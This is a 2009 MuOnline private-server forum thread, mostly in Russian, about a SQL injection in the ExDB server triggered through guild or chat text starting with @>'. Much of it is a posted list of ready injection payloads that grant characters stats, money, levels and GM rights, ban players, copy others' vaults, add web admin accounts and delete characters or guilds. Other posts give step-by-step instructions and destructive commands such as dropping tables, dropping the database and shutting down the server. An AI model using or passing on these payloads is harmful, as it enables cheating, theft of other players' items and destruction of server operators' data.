Exdb Sql Inject - инъекция на всех серверах!

BETWO · 2009 Апр. 30, 01:55

hi , the exdb in the guild notice have a xploit if for example enter @>'delete from character where name = 'BETWO'-- BYE BETwO jajajaja

Download fix *http://multi-up.com/89906

..

xakum · 2009 Апр. 30, 12:48

непонятные исправления. убрано только сообщение об ошибке "Error : System Name Overflow" 0_о

Killbrum · 2009 Апр. 30, 14:45

Исправления нормальные. Это для СЦФ серверов вроде. Короче я не знаю зачем это фиксить т.к. это не критично и т.д. но... скажем был баг ГМа с помощью которого можно было удалить всех чаров из гильды. Зачем фиксить такое - хз т.к. ГМ есть ГМ. Он и так удалять может

xakum · 2009 Апр. 30, 15:08

причем тут удаление из гильдии? и причем тут СЦФ сервер к оригинальному Exdb вебзена? человек говорит о возможности выполнения произвольной sql команды. и коль ты мудр не по годам, то обоснуй чем "Исправления нормальные" в котором убрано отображение 1 таблички?

Killbrum · 2009 Апр. 30, 15:11

Я не мудр по годам и т.д. и у СЦФ тоже оригинал от вз стоит. Разве не так?
Дальше прочти
https://forum.ragezone.com/f551/release-7-0...84/#post4978796

xakum · 2009 Апр. 30, 15:19

обоснований я так и не вижу. да и думаю врятли увижу

glom · 2009 Апр. 30, 18:00

Видел сдесь тему. По sql inject tamper data. Нужны команды .Например 'x' delete character и тд

Colocarte 200 Resets a tu Personaje
'x'; update character set resets = 200 where name = 'NOMBREDETUPJ'

Eliminar todos los Personajes del Server
'x' ; delete character

Cambiar de Raza tu Personaje
'x'; update character set class = 64 where name = 'NOMBREDETUPJ'

0 [DW ], 1 [SM ], 2 [GrandMaster] 16 [dk] 17 [bk] y 18 [bm] 64 [dl] 65 [le]

Desconectar todos los Personajes del Server
'x'; UPDATE MEMB_STAT SET ConnectStat='0' WHERE ConnectStat='1'

Full Stats tu Personaje
'x'; update character set strength=32767,dexterity=32767,energy=32767,vitali ty=32767,leadership=32767 where name = 'Kenya'

Colocar tu Personaje Level 400
'x'; update character set clevel=400 where name = 'NOMBREDETUPJ'

Copiar Vault de Otro Personaje
'x' ; UPDATE warehouse SET Items = (select items from warehouse where accountid = (select accountid from character where name = 'nombrepjacopiarbaul')) WHERE AccountID = 'nombredetucuenta'

Dejar Personaje Normal
'x'; update character set ctlcode = 0 where name = 'NOMBREDETUPJ'

Banear Personaje
'x'; update character set ctlcode = 1 where name = 'NOMBREDETUPJ'

Hacer GM tu Personaje
'x'; update character set ctlcode = 8 where name = 'NOMBREDETUPJ'

Colocarte LevelUP Points
'x'; update character set leveluppoints = 432 where name = 'NOMBREDETUPJ'

Codigo Items En tu Inventario
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB27F0570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB67F0580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB77F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB37F05A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x01EFFF00002FB47F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x0EEFFF00002FB57F0500000000000000 WHERE AccountID = 'mastercito'

----------------------------------------- ANUBIS -------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC2000570000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC4000580000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002CC30F0590000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FC50005A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x03EFFF00002FF50F05B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000FFC60005D0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- BLESS --------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x0DEFFF0000FFC60001E0000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Sun ----------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B07F0078000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B17F0088000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B27F0098000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B37F00A8000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x21EFFF000020B47F00B8000000000000 WHERE AccountID = 'mastercito'
----------------------------------------- Ashcrow ------------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB37F0070000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB47F0080000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB57F0090000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB67F00A0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB77F00B0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x22EFFF0000AFB87F0000000000000000 WHERE AccountID = 'mastercito'
--------------------------------------------- RING -----------------------------------------------------
'x' ; UPDATE warehouse SET Items = 0x15EFFF0000C1C67F00D0000000000000 WHERE AccountID = 'mastercito'
'x' ; UPDATE warehouse SET Items = 0x1CEFFF0000DFB27F00D0000000000000 WHERE AccountID = 'Bakura'

Eliminar Guild
'x' ; Delete Guild

Cambiar Inventario
'x'; update character set inventory = 0x where name = 'NOMBREDETUPJ'

Cambiar Codigo de Administracion Web
'x'; INSERT INTO MuWeb_admin(username,password,securitycode)VALUES( 'MUAdmin','123123','0123')

ZEN Para tu PJ
'x'; update character set money=2000000000 where name = 'NOMBREDETUPJ'
Вот нашел)

Hacer Full stats a tu Personaje
'x'; update character set strength=65000,dexterity=65000,energy=65000,vitali ty=65000,leadership=65000 where name = 'NOMBREDETUPJ'

BETWO · 2009 Май 01, 03:16

umm i post it.. i up a video guide and text whit this injection..

Ronny · 2009 Май 02, 17:23

Недавно пообщался с RPGMakers и он сказал мне про новый метод Инжекта, через ExDB !
Который работает почти на всех MuOnline Серверах !

Что нужно делать :

1.) Создаем Гуилд !
2.) Switch Character
3.) Пишем в чате @>' ; blablalba
4.) Switch Character !

И выполняеться наш blablabal

З.Ы. Под блаблабла подрозумеваеться SQL код ...
Смотрите тему про SQL Inj By nanoman

Удачи

Sinusoid · 2009 Май 02, 19:18

Цитата: Ronny от 2009 Май 02, 14:23 Недавно пообщался с RPGMakers и он сказал мне про новый метод Инжекта, через ExDB !
Который работает почти на всех MuOnline Серверах !

Что нужно делать :

1.) Создаем Гуилд ! 2.) Switch Character 3.) Пишем в чате @>' ; blablalba 4.) Switch Character !

И выполняеться наш blablabal

З.Ы. Под блаблабла подрозумеваеться SQL код ...
Смотрите тему про <noindex>SQL Inj By nanoman</noindex>

Удачи

Но потом этот blablabla не влазит полностью в окно чата

Ronny · 2009 Май 02, 20:52

Цитата: Sinusoid от 2009 Май 02, 16:18 Но потом этот blablabla не влазит полностью в окно чата

для

drop MEMB_INFO

места хватает

parallel · 2009 Май 03, 01:35

Да там места хватает для любого текста,дело в другом..куда там имя чара писать? и нужно ли его писать вообще?

DeSSower · 2009 Май 03, 19:44

Цитата: parallel от 2009 Май 03, 01:35 Да там места хватает для любого текста,дело в другом..куда там имя чара писать? и нужно ли его писать вообще?

как я понел в игре те нада создать

гуилд а потом писать через @> иньекцию , @>'drop database

я счас проверю ввести @>' ';shutdown;--

cokpat · 2009 Май 04, 14:45

и ничего не работает на локалке запустил уже разные верси ExDb мучал и ничего не выходит.

Вывод: туфта

Everybody · 2009 Май 04, 14:48

Цитата: cokpat от 2009 Май 04, 13:45 и ничего не работает на локалке запустил уже разные верси ExDb мучал и ничего не выходит.

Вывод: туфта

Зря такие выводы делаешь если у самого ничего не получилось.

*https://games.in.md/forum/showthread.php?t=1179&page=2
*https://mumoldova.md и другие сервера...
уже кое кто накуралесил.

Ragnarec · 2009 Май 04, 15:22

Цитата: Ronny от 2009 Май 02, 16:23 Недавно пообщался с RPGMakers и он сказал мне про новый метод Инжекта, через ExDB !
Который работает почти на всех MuOnline Серверах !

Что нужно делать :

И выполняеться наш blablabal

З.Ы. Под блаблабла подрозумеваеться SQL код ...
Смотрите тему про <noindex><noindex>SQL Inj By nanoman</noindex></noindex>

Удачи

Абалдеть.... ето что же получается любая сборка которая работает с ExDB (а других я не встречал) уязвима?! ооо как здорово - а как с этим бороться? скачав ExDB с фиксом? а если используется eDataServer?

cokpat · 2009 Май 04, 15:40

Цитата: Everybody от 2009 Май 04, 09:48 Зря такие выводы делаешь если у самого ничего не получилось.
*https://games.in.md/forum/showthread.php?t=1179&page=2 *https://mumoldova.md и другие сервера... уже кое кто накуралесил.

блин.... ну уже и по гайду и вроде с командами дружу и не в какую не хочет дропать не одну таблицу

Не побоюсь предположить что это уязвимость только на SCFMT сборках

Dzib · 2009 Май 06, 20:05

как правильно записать команду в чате окна для drop MEMB_INFO ?

Vaflan · 2009 Май 06, 22:08

На сезоне 1 и 3 проверял, не пашет...
Exdb.exe на серверах... ноль имоций..

Ales · 2009 Май 10, 19:24

если в фильтр сообщений загнать @>' то канать небудет

x-MU.net форум

Exdb Sql Inject - инъекция на всех серверах!

BETWO

xakum

Killbrum

xakum

Killbrum

xakum

glom

BETWO

Ronny

Sinusoid

Ronny

parallel

DeSSower

cokpat

Everybody

Ragnarec

cokpat

Dzib

Vaflan

Ales

Похожие темы (5)